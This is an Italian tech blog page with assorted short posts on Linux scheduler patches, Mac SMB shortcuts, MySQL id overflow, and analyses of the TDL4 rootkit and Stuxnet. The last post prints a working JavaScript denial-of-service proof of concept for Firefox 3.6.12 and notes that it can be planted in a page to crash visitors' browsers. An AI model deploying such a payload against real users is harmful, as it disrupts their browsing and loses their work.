SIAMO GEEK

  • Usabilità contro sicurezza

    In un’organizzazione tipica la proprietà (o chi per lei) si affida all’IT (dipendente, consulente o mix) per la gestione dei dati e della loro sicurezza (intesa sia come integrità sia come protezione).

    L’IT sa benissimo che usabilità e sicurezza sono due vettori uguali e contrari; compito del bravo IT è di mediare le due cose con le necessità aziendali e, spesso, con i capricci di alcuni utenti.

    Fino a poco tempo fa la soluzione della sicurezza informatica era quasi banale perché bastava stabilire un perimetro con accessi controllati: i computer all’interno erano sicuri, quelli all’esterno insicuri e alle porte si mettevano dei guardiani feroci (firewall, proxy e assimilati). (altro…)

    Luigi Rosa

  • Anteprima della patch da 200 righe di Linux

    Quelle che seguono sono le istruzioni di Lennart Poettering per implementare sui sistemi RedHat 6 /CentOS e Ubuntu l’anteprima della patch da 200 righe di Linux.

    Come Linus stesso ha chiarito, questo è il metodo con il quale sono state condotte le prime prove della patch, senza apportare modifiche al kernel. La patch che è seguita è stata la conseguenza dell’esito positivo di queste prove.

    Sto scrivendo questo testo dopo aver seguito le indicazioni dettagliate di seguito. Non sto notando nulla di evidente, anche se non credo che Thunderbird e Firefox riescano a mettere in crisi un sistema Ubuntu a 64 bit con 6 Gb di RAM e controller RAID Adaptec.

    Due parole di avviso prima di procedere. State per modificare dei parametri di funzionamento del kernel, siate ben consci di quello che state per fare e fatelo con estrema cura. Va da sé che è sempre bene avere ben presente un metodo per annullare le modifiche che state per fare, anche in caso di impossibilità di fare il boot con il PC. La modifica interessa l’utilizzo interattivo di Linux e non ha effetto sui server.

    (altro…)

    Luigi Rosa

  • Mac OSX: shortcut di share SMB

    Oggi un cliente mi chiede come fare lo shortcut di uno share di un server Windows 2003 sul desktop di un Mac OSX.

    L’azione è banale con Windows o con Gnome, ma si è rivelata inaspettatamente non intuitiva con MacOS.

    È ovvio che ogni interfaccia utente ha proprie caratteristiche. Questo articolo non vuole dare giudizi di merito sulle interfacce basandosi su un dettaglio. I partigiani delle varie piattaforme sono avvertiti.

    (altro…)

    Luigi Rosa

  • Meta Tag, come li usi?

    Non sono mai stato un amante dei META TAG, ma sono sempre piuttosto fondamentali per i (sempre più) numerosi Search Engine. E’ vero che più si va avanti più i sistemi SEO non si basano più solo ed esclusivamente su quelli, ma certo è che la visibilità passa ancora per questi (maledetti) tag.

    Proprio ieri un amico mi chiedeva se avessi qualche indicazione e suggerimento per lui, per come dovesse impostare i META TAG, cosa e come compilarli, quali info mettere, ecc. ecc. Non mi voglio considerare un esperto nel settore e mi sono limitato a girargli un tool online, il Free Meta Tag Analyzer, che analizza gli elementi del sito che gli viene indicato, fornendo come risposta un indice di visibilità e, soprattutto, una piccola ma piuttosto completa analisi completa di suggerimenti.
    (Se poi volete diventare (a pagamento) utenti del sito avrete a disposizione un numero di tool molto maggiore).

    Attenzione. Così come per l’altro tool da me suggerito (relativo alle performance), anche in questo caso non vengono fornite soluzioni (e meno male) ma solo consigli. Sta poi a chi si occupa del sito di leggere e capire sia l’analisi ed i suggerimenti e valutare se metterli in pratica o meno.

    Kazuma

  • Volete vedervi congelati nella carbonite?

    Liberate l’inguaribile geek il contrabbandiere correliano che c’è in voi e non perdete l’occasione di farvi ritrarre congelati nella carbonite.

    Il modellino di voi stessi viene solo 50 dollari.

    La principessa non è inclusa.

    Luigi Rosa

  • Aggiornamento per Acrobat e Adobe Reader

    Da ieri sera (ora europea) Adobe ha rilasciato gli aggiornamenti per Acrobat e Adobe Reader per Windows, UNIX e OSX.

    L’ultima versione di Adobe Reader è, quindi, la 9.4.1 ed è l’unica a non essere interessata dai problemi scoperti a fine ottobre.

    Luigi Rosa

  • Rootkit che bypassa la protezione della firma digitale dei driver Windows

    TDL4 è la nuova versione di una famiglia di rootkit già noti che abbassa le difese di Windows a 64 bit contro il caricamento nel kernel di driver non firmati.

    La prima parte del malware si annida nel MBR e modifica in memoria il parametro del kernel LoadIntegrityCheckPolicy e fa in modo che vengano accettati anche i driver non firmati in maniera digitale.

    Questo permette al kernel di caricare una versione modificata di kdcom.dll, un componente del debugger del kernel. Le funzioni modificate dal malware esportate dalla DLL bloccano di fatto molti tentativi di debugging del rootkit.

    Se la parte del rootkit caricata nel MBR non entrasse in azione, la DLL sostituita provocherebbe un errore tipo *** Windows is unable to verify the signature of the file \Windows\system32\kdcom.dll. Ma l’abbassamento del livello di sicurezza forza il kernel a non effettuare alcuna verifica.

    A questo punto la porta è aperta per il caricamento di qualsiasi altra schifezza nel kernel. (via Threat Post)

    Luigi Rosa

  • 200 righe di patch che fanno la differenza

    Linux è abbastanza consolidato nell’ambiente server, ma deve ancora crescere come kernel adatto ad un utilizzo interattivo al di fuori degli smanettoni.

    Negli ultimi mesi sono state proposte molte patch al kernel per migliorare la risposta interattiva del sistema.

    Mike Galbraith ha proposto una patch basata su un’idea di Linus Torvalds che sembrerebbe fare davvero la differenza. Lo stesso Linus ha commentato «Good job. Group scheduling goes from “useful for some specific server loads” to “that’s a killer feature”.»

    La patch introduce 224 nuove righe di codice e ne toglie 9, ma il risultato sembra essere incredibile: la latenza dello scheduler cala di 10 volte nei momenti di picco d di 60 volte con un carico medio. Il risultato è un’esperienza di utilizzo più fluida e veloce. (via Phoronix)

    Aggiornamento 19/11/2010 08:00 – È possibile modificare il kernel per avere un’anteprima della patch.

    Luigi Rosa

  • Istruzioni per l’uso IKEA

    Se le istruzioni per alcuni aspetti della vita fossero scritte da IKEA?

    CollegeHumor ha fatto alcuni esempi.

    Luigi Rosa

  • Id autoincrementale delle tabelle MySQL

    Tabella giri-velocità / RPM-speed tablePremetto che sono un fan sfegatato degli id interi autoincrementali delle tabelle SQL usati come chiave primaria. Prima o poi tornano utili e fanno comunque comodo.

    Un collega qualche giorno fa mi ha detto di essere un po’ perplesso degli id autoincrementali per via del rischio di overflow.

    MySQL, infatti, in caso di raggiungimento del limite del contatore autoincrementale non permette di aggiungere ulteriori record. Non è una bella situazione. Mi sono deciso, quindi, a fare un paio di conti.

    Ipotizziamo un id autoincrementale di tipo UNSIGNED INT: abbiamo 4 byte di dati, pari a 32 bit pari a 4.294.967.295 in base decimale. Ipotizzando l’inserimento in una tabella di un milione di record al giorno (11 record al secondo) avremmo 4.295 giorni (poco meno di 12 anni) di vita della nostra tabella. Decisamente inaccettabile.

    Meglio utilizzare un id autoincrementale di tipo UNSIGNED BIGINT: 8 byte, 64 bit e 18.446.744.073.709.551.615 possibili valori. Se ipotizziamo un miliardo di record al giorno (11.500 al secondo) potremmo avere spazio di crescita per circa 25 milioni di anni. Potrebbe essere sufficiente.

    Luigi Rosa

  • Stuxnet era davvero fatto per le centrali iraniane

    Un nuovo sviluppo nella analisi del worm Stuxnet sembra confermare che in effetti era stato realmente progettato per attaccare le centrali nucleari iraniane.

    L’analisi portata avanti da Symantec spiega come il worm cerchi un PLC che sia collegato a specifici modelli di controlli per motori (due marche soltanto, una delle quali e` iraniana). Se li trova, verifica che stiano operando entro un certo range di frequenza (e quindi di velocita` dei motori), e solo se queste condizioni sono verificate, allora inizia a provocare brevi ma significative variazioni della velocita` dei motori, introducendo malfunzionamenti sporadici e non ripetibili, i quali sono ovviamente difficilissimi da scoprire e diagnosticare. Leggetevi l’originale, ve lo consiglio.

    Kurgan

  • 0day di Mozilla Firefox 3.6.12

    <!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>

    Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

    Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

    Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

    Il problema è stato scoperto dal gruppo italiano Backtrack.

    Luigi Rosa